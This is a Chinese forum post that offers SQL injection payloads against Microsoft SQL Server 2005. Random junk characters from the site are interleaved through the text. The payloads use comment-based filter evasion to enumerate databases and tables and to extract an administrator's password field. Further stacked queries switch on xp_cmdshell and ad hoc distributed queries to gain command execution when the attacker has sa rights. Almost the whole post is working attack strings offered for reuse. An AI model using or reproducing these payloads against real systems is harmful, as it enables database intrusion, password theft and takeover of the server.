找回密码
 立即注册
查看: 3085|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
2 _+ n& c9 R" x% x% a

3 e$ r, n$ m2 j- l  X! r- L$ u
: q0 A, }' M! q, h$ p6 ^% I0 B[Copy to clipboard]CODE:
: C" _9 d' ~3 D2 P/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--0 C: t& x4 D/ R% a2 P: W- e

+ B% S1 D# e% O. o爆表语句,somedb部份是所要列的数据库,红色数字1累加
' w3 u" z+ f$ f
9 ^, m. D& P( o; x, Q% d/ W) d7 q) }0 P0 m/ J1 T* u: t8 \
[Copy to clipboard]CODE:
; [$ c& a+ x/ Q# `, l# i5 c  ^8 N7 S/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
5 k& d+ Q( }% i8 R4 r* q% c; }; u; K: C) W; _
爆字段语句,爆表admin里user='icerover'的密码段" y2 {. y  F; p8 I, U0 i7 B7 S7 `
2 |5 y; q+ S% o$ k+ u% ~
' p1 |2 ?# Z" B4 ]; d! U
[Copy to clipboard]CODE:6 D- y0 e9 F5 ?/ ~# k
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
0 J% a% |3 Z  }* B3 `  D7 A" L
) J2 I+ ?, j2 t( K3 X: D/ p5 rmssql2005默认没有开xp_cmdshell的,openrowset也不能用2 s% {4 y; W4 n4 |/ M, ^
如果是sa权限,可以这样来开启
6 n  y, v# w- w% K* p2 v开启openrowset
8 o0 e2 e* w% I) c+ e% ^- ?2 O4 T: n2 ~$ Z. C1 `4 K( u7 W
  d% P6 @7 w5 j, f& _0 g$ S
[Copy to clipboard]CODE:
3 x+ ^5 x8 G% C& ]9 |/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--) m1 k! A1 Z; W/ D) s( x
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--3 D* o5 {* V. q1 a  [1 k! m
2 A( Z5 [) n7 i7 q6 ~9 \
开启xp_cmdshell! A$ m; x# @2 d5 S

" ?# P( l2 P8 s& J  c
5 J- X, d! b/ J( C# D[Copy to clipboard]CODE:
  u# y: V( |3 nEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--6 x8 }! w# D  L
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--1 G/ C3 }/ N& k
' X7 H+ r4 s) t, v9 s/ m
ok,over~~晚安1 N" S& o2 U/ V2 R. a; @: C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表